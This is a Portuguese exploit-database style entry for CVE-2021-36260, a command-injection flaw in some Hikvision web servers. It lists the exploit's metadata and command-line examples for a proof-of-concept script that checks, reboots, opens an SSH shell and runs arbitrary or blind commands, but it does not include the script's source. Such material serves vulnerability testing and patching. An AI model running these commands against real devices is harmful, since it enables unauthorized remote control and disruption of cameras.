
Vulnerabilidade de injeção de comandos no servidor web de alguns produtos Hikvision. Devido à validação de entrada insuficiente, um atacante pode explorar a vulnerabilidade para lançar um ataque de injeção de comandos enviando algumas mensagens com comandos maliciosos.
CVE-2021-36260 POC vulnerabilidade de injeção de comandos no servidor web de alguns produtos Hikvision. Devido à validação insuficiente de entrada, um atacante pode explorar a vulnerabilidade para lançar um ataque de injeção de comandos enviando algumas mensagens com comandos maliciosos.
Título do Exploit: Hikvision Web Server Build 210702 - Injeção de Comandos
Autor do Exploit: bashis
Site do Fabricante: https://www.hikvision.com/
Versão: 1.0
CVE: CVE-2021-36260
Referência: https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
Nota:
[Exemplos] Verificação segura de vulnerabilidade/verificação: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check
Verificação segura e insegura de vulnerabilidade/verificação: (usará 'verificação insegura' apenas se não for verificado com 'verificação segura') $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --check --reboot
Verificação insegura de vulnerabilidade/verificação: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --reboot
Iniciar e conectar ao shell SSH: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --shell
Executar comando: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd "ls -l"
Executar comando cego: $./CVE-2021-36260.py --rhost 192.168.57.20 --rport 8080 --cmd_blind "reboot"